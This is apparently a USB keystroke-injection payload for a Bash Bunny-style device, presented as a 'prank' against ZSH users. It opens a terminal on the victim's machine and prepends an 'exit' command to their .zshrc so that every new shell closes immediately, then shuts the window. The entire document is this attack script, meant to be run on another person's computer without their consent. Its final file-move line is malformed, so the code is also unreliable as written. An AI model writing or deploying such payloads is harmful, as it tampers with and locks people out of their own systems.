###########################################################
#                                                         #
# Title       : This damn shell doesn't work, SO SAD! :C  #
# Author      : Aleff                                     #
# Version     : 1.0                                       #
# Category    : Prank                                     #
# Target      : ZSH Shell                                 #
#                                                         #
###########################################################

ATTACKMODE HID

# Requirements:
#     - Nothing <3

QUACK DELAY 1000
QUACK CTRL-ALT t
QUACK DELAY 2000
QUACK STRING echo \"exit\" > .tmp
QUACK ENTER
QUACK DELAY 500
QUACK STRING cat .zshrc >> .tmp
QUACK ENTER
QUACK DELAY 500
QUACK STRING mv .tmp >> .zshrc
QUACK ENTER
QUACK DELAY 500
QUACK ALT F4
